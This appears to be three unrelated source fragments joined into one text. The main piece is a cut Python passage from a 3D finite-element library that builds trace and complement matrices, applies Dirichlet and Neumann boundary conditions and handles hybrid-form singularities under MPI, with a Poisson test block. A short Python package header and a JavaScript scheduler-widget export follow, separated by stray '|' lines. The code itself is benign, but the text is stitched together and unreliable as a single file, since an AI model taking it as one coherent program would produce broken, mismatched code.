adt1.prime.TW.do.push_BC_to_instant(time)
T = adt1.matrices.trace
D = EWC_SparseMatrix(mesh, (adt1.num.basis, adt1.num.basis))
C = e1.matrices.complement
b = EWC_ColumnVector(mesh, adt1)
T.gathering_matrices = (adt1, sf)
D.gathering_matrices = (adt1, adt1)
C.gathering_matrices = (adt1, e1)
b.gathering_matrix = adt1
#----- get boundaries and do a check --------------------------------------
Dirichlet_boundaries = adt1.BC.valid_boundaries
Neumann_boundaries = sf.BC.valid_boundaries
bns = mesh.boundaries.names
SDb = set(Dirichlet_boundaries)
SNb = set(Neumann_boundaries)
assert SDb & SNb == set() , f"Dirichlet_boundaries intersect Neumann_boundaries is not None."
assert SDb | SNb == set(bns), f"Dirichlet_boundaries union Neumann_boundaries is not full!"
#-------- set Neumann boundary condition ---------------------------------------------------
sf.BC.valid_boundaries = Neumann_boundaries
adt1.BC.valid_boundaries = Neumann_boundaries
col_pc = sf.BC.partial_cochain
row_pd = adt1.BC.partial_dofs
T = T.adjust.identify_rows_according_to_two_CSCG_partial_dofs(row_pd, col_pc)
b = b.adjust.set_entries_according_to_CSCG_partial_cochains(row_pd, col_pc)
#-------- set Dirichlet boundary condition -------------------------------
adt1.BC.valid_boundaries = Dirichlet_boundaries
adt_pc = adt1.BC.partial_cochain
D = D.adjust.identify_rows_according_to_CSCG_partial_dofs(adt_pc)
T = T.adjust.clear_rows_according_to_CSCG_partial_dofs(adt_pc)
b = b.adjust.set_entries_according_to_CSCG_partial_cochains(adt_pc, adt_pc)
#---------------- Send T, C for hybrid singularity overcoming ------------------------------
T, C, SKIPPED_edge_elements = self.___PRIVATE_overcoming_hybrid_singularity___(
T, C, Dirichlet_boundaries=Dirichlet_boundaries)
#------------- make a special Gathering matrix for the 1-edge-form ------------------------
eGM = self.___PRIVATE_1ef_hybrid_GM___(SKIPPED_edge_elements)
return T, D, C, b, eGM
def ___PRIVATE_1ef_hybrid_GM___(self, SKIPPED_edge_elements):
"""We make a special gathering matrix of the 1-edge-form using for the hybrid singularity overcoming."""
mesh = self._sf_.mesh
p = self._sf_.space.p
px, py, pz = p
D_p_D = {'NS':px, 'WE':py, 'BF':pz} # Direction-p-Dict
#------- take care SKIPPED_edge_elements -----------------------------------------------
SKD = dict()
for e in SKIPPED_edge_elements:
if e in mesh.edge.elements:
meee = mesh.edge.elements[e]
direction = meee.direction
SKD[e] = D_p_D[direction]
___ = cOmm.allgather(SKD)
SKD = dict()
for _ in ___: SKD.update(_)
#---------------------------------------------------------------------------------------
_EEW_GV_ = dict()
TA_NB = mesh.edge.elements.___PRIVATE_find_type_and_amount_numbered_before___()
assert len(TA_NB) == len(mesh.edge.elements)
MINUS = 0
for ee in mesh.edge.elements:
if ee in SKD:
_EEW_GV_[ee] = [0 for _ in range(SKD[ee])]
else:
ta_NB = TA_NB[ee]
nx, ny, nz = ta_NB
BEFORE = nx * px + ny * py + nz * pz # normal numbering condition
_2bd_ = list()
for sk in SKD:
if sk < ee:
MINUS += SKD[sk]
_2bd_.append(sk)
else:
break
for _ in _2bd_:
del SKD[_]
BEFORE -= MINUS
direction = mesh.edge.elements[ee].direction
if direction == 'NS':
_EEW_GV_[ee] = range(BEFORE, BEFORE + px)
elif direction == 'WE':
_EEW_GV_[ee] = range(BEFORE, BEFORE + py)
elif direction == 'BF':
_EEW_GV_[ee] = range(BEFORE, BEFORE + pz)
else:
raise Exception()
eGM = dict()
for me in mesh.elements:
E_MAP = mesh.edge.elements.map[me]
GV = list()
for mee in E_MAP:
GV.append(_EEW_GV_[mee])
GV = array([_ for _ in chain(*GV)])
eGM[me] = Gathering_Vector(me, GV)
eGM = Gathering_Matrix(eGM, mesh_type='_3dCSCG')
return eGM
def ___PRIVATE_overcoming_hybrid_singularity___(self, T, C, Dirichlet_boundaries=None):
"""
Parameters
----------
T :
The trace matrix.
C :
The complementary matrix.
Dirichlet_boundaries :
The mesh boundaries where we will apply direct boundary condition to the (AD)trace dofs.
For example, in the Poisson problem. The potential boundaries are a Dirichlet_boundaries.
Returns
-------
"""
assert self._sf_.IS.hybrid, f"Only hybrid 1-form has this problem."
assert T.__class__.__name__ == 'EWC_SparseMatrix'
assert C.__class__.__name__ == 'EWC_SparseMatrix'
mesh = self._sf_.mesh
boundaries_names = mesh.boundaries.names
if Dirichlet_boundaries is None:
Dirichlet_boundaries = list()
elif isinstance(Dirichlet_boundaries, str):
Dirichlet_boundaries = [Dirichlet_boundaries,]
else:
assert isinstance(Dirichlet_boundaries, (list, tuple)), \
f"Dirichlet_boundaries={Dirichlet_boundaries} is wrong."
assert len(set(Dirichlet_boundaries)) == len(Dirichlet_boundaries), \
f"Repeated boundaries found in {Dirichlet_boundaries}."
for _, Db in enumerate(Dirichlet_boundaries):
assert Db in boundaries_names, \
f"Dirichlet_boundaries[{_}] = {Dirichlet_boundaries[_]} is not a valid boundary."
nT = dict() # the new Trace matrix.
nC = dict() # the new Trace matrix.
SKIPPED_edge_elements = list()
for i in range(mesh.edge.elements.GLOBAL_num):
if i in mesh.edge.elements:
edge_element = mesh.edge.elements[i]
on_mesh_boundaries = edge_element.on_mesh_boundaries
skip = False
for mb in on_mesh_boundaries:
if mb in Dirichlet_boundaries:
skip = True
break
else:
skip = False
skip = cOmm.allreduce(skip, op=MPI.LOR)
if skip:
SKIPPED_edge_elements.append(i)
else:
SOS = mesh.edge.elements.do.find.hybrid_singularity_overcoming_setting(i)
if SOS is None: # this core has no business with this SOS
pass
else:
replacing = SOS.replacing
mesh_element, corner_edge = replacing
through = SOS.through
assert mesh_element in mesh.elements
sf_local_dofs = self._sf_.numbering.do.find.local_dofs_on_element_corner_edge(
corner_edge)
trace_element, trace_edge = through
T_MAP = mesh.trace.elements.map[mesh_element]
for si, _ in enumerate(T_MAP):
if _ == trace_element:
break
trace_face = 'NSWEBF'[si]
tf_local_dofs = self._sf_.space.local_numbering.\
___PRIVATE_find_MESH_ELEMENT_WISE_local_dofs_of_1Trace_edge___(
trace_face, trace_edge
)
positions = edge_element.positions
for pos in positions:
if int(pos[:-2]) == mesh_element:
edge_name = pos[-2:]
break
ef_local_dofs = self._sf_.space.local_numbering.\
___PRIVATE_find_MESH_ELEMENT_WISE_local_dofs_of_1edge_edge___(
edge_name
)
assert len(sf_local_dofs) == len(tf_local_dofs) == len(ef_local_dofs), \
f"Trivial check!"
if mesh_element not in nT:
nT[mesh_element] = T[mesh_element].copy().tolil()
V = nT[mesh_element][tf_local_dofs, sf_local_dofs]
nT[mesh_element][tf_local_dofs, sf_local_dofs] = 0
if mesh_element not in nC:
nC[mesh_element] = C[mesh_element].copy().tolil()
nC[mesh_element][tf_local_dofs, ef_local_dofs] = V
for _ in T:
if _ not in nT:
nT[_] = T[_]
else:
# noinspection PyUnresolvedReferences
nT[_] = nT[_].tocsr()
for _ in C:
if _ not in nC:
nC[_] = C[_]
else:
# noinspection PyUnresolvedReferences
nC[_] = nC[_].tocsr()
nT = T.__class__(mesh, nT, cache_key_generator = 'no_cache')
nC = C.__class__(mesh, nC, cache_key_generator = 'no_cache')
return nT, nC, SKIPPED_edge_elements
if __name__ == '__main__':
# mpiexec -n 5 python objects\CSCG\_3d\forms\standard\_1s\special\main.py
from objects.CSCG._3d.master import MeshGenerator, SpaceInvoker, FormCaller, ExactSolutionSelector
elements = [2,2,2]
# mesh = MeshGenerator('crazy_periodic', c=0.1)(elements)
mesh = MeshGenerator('crazy', c=0.1)(elements)
ES = ExactSolutionSelector(mesh)('Poisson:sincos1')
Dirichlet_boundaries = ['Back', 'Front', 'West', ] #
Neumann_boundaries = ["East", 'South', 'North', ]
# mesh = MeshGenerator('bridge_arch_cracked')(elements)
space = SpaceInvoker('polynomials')([2, 3, 4])
FC = FormCaller(mesh, space)
f1 = FC('1-f', is_hybrid=True)
t1 = FC('1-adt')
e1 = FC('1-e')
f1.TW.BC.body = ES.status.velocity
f1.TW.do.push_BC_to_instant(0)
f1.BC.valid_boundaries = Neumann_boundaries
t1.prime.TW.BC.body = ES.status.velocity.components.T_perp
t1.prime.TW.do.push_BC_to_instant(0)
t1.BC.valid_boundaries = Dirichlet_boundaries
T, D, C, b, eGM = f1.special.hybrid_pairing(t1, e1)
reports = T.do.clean()
# T = t1.matrices.trace
# C = e1.matrices.complement
# T, C = f1.special.___PRIVATE_overcoming_hybrid_singularity___(
# T, C, Dirichlet_boundaries=Dirichlet_boundaries)[:2]
# # # f1.dofs.visualize.matplot.connection_through_trace_dof(55, T, C, t1, e1, checking_mode=True)
# #
# #
# # #
# for i in range(t1.prime.numbering.gathering.GLOBAL_num_dofs):
# f1.dofs.visualize.matplot.connection_through_trace_dof(i, T, C, t1, e1, checking_mode=True)
#
# for i in range(e1.numbering.gathering.GLOBAL_num_dofs):
# f1.dofs.visualize.matplot.connection_through_around_edge_dof(
# i, T, C, t1, e1, checking_mode=True)
|
# -*- coding: utf-8 -*-
"""library - Example module."""
__title__ = 'example'
__version__ = '0.1.0'
__author__ = 'constrict0r <constrict0r@protonmail.com>'
__all__ = []
|
"use strict";
/**
* @name dxScheduler
* @publicName dxScheduler
* @inherits Widget, DataHelperMixin
* @groupName Time Management Widgets
* @module ui/scheduler
* @export default
*/
module.exports = require("./scheduler/ui.scheduler");
|